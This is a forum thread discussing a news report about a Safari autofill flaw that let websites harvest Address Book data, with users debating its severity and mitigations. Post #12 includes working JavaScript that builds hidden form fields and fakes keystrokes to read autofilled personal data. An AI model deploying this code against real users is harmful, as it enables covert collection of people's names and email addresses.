or Connect
AppleInsider › Forums › Software › Mac Software › Security researcher demos autofill exploit in Apple Safari
New Posts  All Forums:Forum Nav:

Security researcher demos autofill exploit in Apple Safari

post #1 of 28
Thread Starter 
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.

Jeremiah Grossman revealed on his blog this week that users who have the "AutoFill web forms" feature enabled on Safari versions 4 and 5 is vulnerable to malicious code. The AutoFill feature is enabled by default in Apple's Web browser.

The feature automatically fills online text forms that have specific, common names, such as "name," "company," "city," "state," "e-mail," and more. The information is automatically grabbed from the user's personal record included in the operating systems' address book. That means the information could be obtained without the user even entering it into the Safari browser.

"All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript," Grossman wrote. "When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker."

He also created a proof-of-concept to show how it takes "mere seconds" to obtain the personal information. Grossman said the data could be used to send e-mail spam or conduct a phishing attack.



"Fortunately any AutoFill data starting with a number, such as phone numbers or street addresses, could not be obtained because for some reason the data would not populate in the text field," he said. "Still, such attacks could be easily and cheaply distributed on a mass scale using an advertising network where likely no one would ever notice because it's not exploit code designed to deliver rootkit payload."

Safari 5, the latest version of Apple's Web browser, was released in June. It added extensions and expanded HTML5 support for the desktop software.
post #2 of 28
Quote:
Originally Posted by AppleInsider View Post

The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.

Yikes that is a bad one. I unchecked it right now.

Life is too short to drink bad coffee.

Reply

Life is too short to drink bad coffee.

Reply
post #3 of 28
I've always made sure that these two are unchecked.
post #4 of 28
I will be interested to hear the Apple response to this. I find it almost too obvious to be plausible. What malicious code has been proven to access this so far? I did disable it though
From Apple ][ - to new Mac Pro I've used them all.
Long on AAPL so biased
Google Motto "You're not the customer. You're the product."
Reply
From Apple ][ - to new Mac Pro I've used them all.
Long on AAPL so biased
Google Motto "You're not the customer. You're the product."
Reply
post #5 of 28
Tested this, is confirmed (and scary). Luckily I switched over from Firefox+Safari to Chrome+Firefox a while ago. It does not seem to work on either of those 2 (I have autofill off on both though).

It would take about 30 seconds of so to find out your name, email, address, which means a video site or a long article site would be the best place for this to wok.
--SHEFFmachine out
Da Bears!
Reply
--SHEFFmachine out
Da Bears!
Reply
post #6 of 28
Quote:
Originally Posted by digitalclips View Post

I will be interested to hear the Apple response to this. I find it almost too obvious to be plausible. What malicious code has been proven to access this so far? I did disable it though


Yep. Javascript and Ajax, the savior of the of the web.

I just tested the fields that have numbers. When you start the phone with a "(" it does give you a drop down list presumably using Javascript. So if you could figure out the innerHTML being used, one might be able to get that info as well. Same thing with the address field. You get a drop down select list.

I have to do some more testing. I'm curious whether SSL prevents it, but signed certificates would at least be more trustworthy.

Life is too short to drink bad coffee.

Reply

Life is too short to drink bad coffee.

Reply
post #7 of 28
That's not good, but I use 1password.
post #8 of 28
I also uncheck that every time I install Safari. Human beings can't make perfectly secure software, that's the evidence anyway.
post #9 of 28
Could? I could break my ankle while walking.
post #10 of 28
Thanks for the info. Autofill almost wrecked a holiday earlier this year because safari auto-populated my first name onto my partner's airline ticket without me noticing. Thankfully the lady at the check-in desk was moderately understanding.
post #11 of 28
Quote:
Originally Posted by AppleInsider View Post

The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered. ...

I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.

*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,

That web site can get your name and address. Wow.

I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...

... the phone book in every public telephone in my home town.
post #12 of 28
You can't get it to run faster than 30 seconds per field. every key event you can fake to produce the autofill effect takes 1/2 a second and if you interrupt that time you'll end up ruining the autocomplete hack.


function start() {
\tvar str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
\tvar charset = str.split("");\t
\tvar d = document.getElementById('data');
\tvar f = [];
\tvar i = [];
\t//var char = charset.shift();
\tfor(var xx = 0; xx < 26; xx++){
\t\tf[xx] = document.createElement('form');
\t\tf[xx].id = 'form'+xx;
\t\ti[xx] = document.createElement('input');
\t\ti[xx].type = "text";
\t\ti[xx].name = 'name';
\t\ti[xx].id = "iname"+xx;
\t\tf[xx].appendChild(i[xx]);
\t\tdocument.getElementById('hack').appendChild(f[xx]);
\t\tvar event = document.createEvent('TextEvent');
\t\tevent.initTextEvent('textInput', true, true, null, charset[xx]);
\t
\t\ti[xx].value = "";
\t\ti[xx].selectionStart = 0;
\t\ti[xx].selectionEnd = 0;
\t\ti[xx].focus();
\t\ti[xx].dispatchEvent(event);\t
\t}
\t
\tsetTimeout(function() {
\t\tfor(var xx = 0; xx < 26; xx++){
\t\t\tvar i = document.getElementById('iname'+xx);
\t\t\tif (i.value.length > 1) {
\t\t\t\td.innerHTML += i.value + "<br>\
";
\t\t\t}
\t\t}
\t}, 500);

}
Groupthink is bad, mkay. Think Different is the motto.
Reply
Groupthink is bad, mkay. Think Different is the motto.
Reply
post #13 of 28
Quote:
Originally Posted by Prof. Peabody View Post

I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.

*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,

That web site can get your name and address. Wow.

I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...

... the phone book in every public telephone in my home town.

If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Never the less, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.

Life is too short to drink bad coffee.

Reply

Life is too short to drink bad coffee.

Reply
post #14 of 28
Quote:
Originally Posted by mstone View Post

If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Never the less, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.

Agreed that it's a security flaw.

It's just a small, weird, kind of silly security flaw IMO.

But all over the web today there are scary stories about this "awful" "dangerous" flaw. Ars is actually running with a headline that says "Apple the new world leader in software insecurity." Which is absolutely ridiculous in it's implications.

As with Antennagate, the media is having fun making it seem like Apple is evil incarnate etc.
post #15 of 28
Nasty.
I think we'll see a quick security patch here. I guess a LOT of people are using Auto Fill..
post #16 of 28
How come I can't get it to Autofill anything? I'm using WebKit, which essentially uses Safari 5, only difference is the rendering engine is slightly newer. I got all blanks for everything when I ran it, so I must be doing something wrong, even though Autofill is checked for all those boxes. Well, since the test failed, I suppose I can claim I broke the test even though I used Safari
post #17 of 28
Maybe an opportunity here for someone to write a plugin that responds to auto-fill requests with a bogus address book entry - and then allow you to manually allow the correct data to be filled in.
post #18 of 28
What we really need is a Safari version of NoScript (a FF plugin). That would preclude untrusted Javascript, especially JS not from the server you are knowingly visiting, from running and completely cut off malicious JS and click-jacking as possibilities.

It does take a little bit to get it configured, but guess what, ssshhhhh ... <whispering>NoScript can also kill all the 3rd party analytic Javascript running on your browsing sessions.

If you can't get click-jacked, almost all the web malware gets cut out except for the crap like giving out your password to load video codecs...
.
Reply
.
Reply
post #19 of 28
Could it be because I have a different language set-up as default?
post #20 of 28
The autofill is really handy for all the forum, lo risk sites that require usernames and passwords. I just don't use it for Banks, Paypal etc anything with sensitive information, plus my Bank does not allow you to save passwords and usernames. Isn't it just a case of using common sense when it comes to your own security?. Like someone mentioned 1Password is a good alternative, and make sure you have Firewall's activated as well as router security.
post #21 of 28
Quote:
Originally Posted by mstone View Post

If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting.

It is many years since I get unsolicited telemarketing on my home phone line, personally addressed to me. It is very annoying and has obviously nothing to do with such vulnerabilities in web browsers. Companies have other and more sure means to collect personal information, with the most obvious being the telephone directory. That one is not going to disappear auto-magically after a security update.

Quote:
Originally Posted by mstone View Post

Never the less, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.

Here I agree but I don't see much potential for harm. Hopefully it will be trivial for Apple to close the hole.
post #22 of 28
Quote:
Originally Posted by Pinolox View Post

Could it be because I have a different language set-up as default?

That may be the reason. Also, if I remember correctly, Safari does not auto-complete fields in secured web pages (https), although I cannot tell if this is due to a Safari feature or to something coded in the page.
post #23 of 28
Quote:
Originally Posted by PB View Post

That may be the reason. Also, if I remember correctly, Safari does not auto-complete fields in secured web pages (https), although I cannot tell if this is due to a Safari feature or to something coded in the page.

It's not a secure page. I tried the "proof of concept" page and it didn't returned anything. The closest I got to see some personal info was with Chrome, which showed autocomplete drop-down suggestions, but didn't actually filled out the field.
Camino, OTOH, somehow prevented the script to cycle through the fields.

I'm quite surprised that the language has an impact, since I thought at system-level the Address Book fields are identified by #IDs or English strings (hint: I'm not a Mac software developer)
post #24 of 28
Quote:
Originally Posted by palegolas View Post

Nasty.
I think we'll see a quick security patch here. I guess a LOT of people are using Auto Fill..

its on by default. if you need proof of how many people keep things on by default, check the ie market share
Groupthink is bad, mkay. Think Different is the motto.
Reply
Groupthink is bad, mkay. Think Different is the motto.
Reply
post #25 of 28
Quote:
Originally Posted by PB View Post

That may be the reason. Also, if I remember correctly, Safari does not auto-complete fields in secured web pages (https), although I cannot tell if this is due to a Safari feature or to something coded in the page.

a malicious site wouldnt be using a secure page. this is something you'd accidentally stumble upon, not something that would accidentally happen on a page you purposely visited. imagine that it's in a myspace or facebook page / app. it could compromise millions of people
Groupthink is bad, mkay. Think Different is the motto.
Reply
Groupthink is bad, mkay. Think Different is the motto.
Reply
post #26 of 28
Safari is not the only browser with autofill - where is the comparative analysis showing that every browser on every platform suffers from the same thing?

And where is the alert that a web page has asked my system to provide personal information even though that info is not needed and does not appear on the screen anywhere?

I am sure that is the source of lots of junk mail - I don't use my son's email except to register him for online games - but I get junk mail to his account that must be coming from sites I visit on my system which does not have a user logon for him - but on which I have an email client setup so I can keep an eye on his email.

In my opinion - ANY information AT ALL - that is requested by a web site - should pop up in a message box - indicating who is asking and why - and some option to exclude specific info if you want or to include all or exclude all and to remember this action for a given domain.

At the very least it would be interesting to learn how many 3rd parties are grabbing info without your knowledge or permission.

Yes I know I could use something like little snitch or private browsing (on some browsers) - but it just strikes me as wrong that every company who puts out a browser by default allows anyone who asks to be handed you private information without your knowledge or consent. that is a privacy issue that our government officials should have been asking about a decade ago.
post #27 of 28
Quote:
Originally Posted by lilgto64 View Post

Safari is not the only browser with autofill - where is the comparative analysis showing that every browser on every platform suffers from the same thing?
.

Apparently the difference between how Safari auto fills and how Firefox does it is that on certain fields Safari actually fills in the form fields where Firefox only offers suggestions in a pull down select list. The exploit can only grab the info after it goes into the field. Keep in mind that the form doesn't visually appear on the page. The fields only exist in memory.

Life is too short to drink bad coffee.

Reply

Life is too short to drink bad coffee.

Reply
post #28 of 28
Quote:
Originally Posted by ihxo View Post

That's not good, but I use 1password.

Yep, same here. I also have the keychain turned off and deleted most of my data in it. I strongly suggest people look into either 1Password or LastPass.
Switching From Windows on Nov. 30th 2007
-------------------------------------
MacBook Pro 13" 2011
Reply
Switching From Windows on Nov. 30th 2007
-------------------------------------
MacBook Pro 13" 2011
Reply
New Posts  All Forums:Forum Nav:
  Return Home
  Back to Forum: Mac Software
AppleInsider › Forums › Software › Mac Software › Security researcher demos autofill exploit in Apple Safari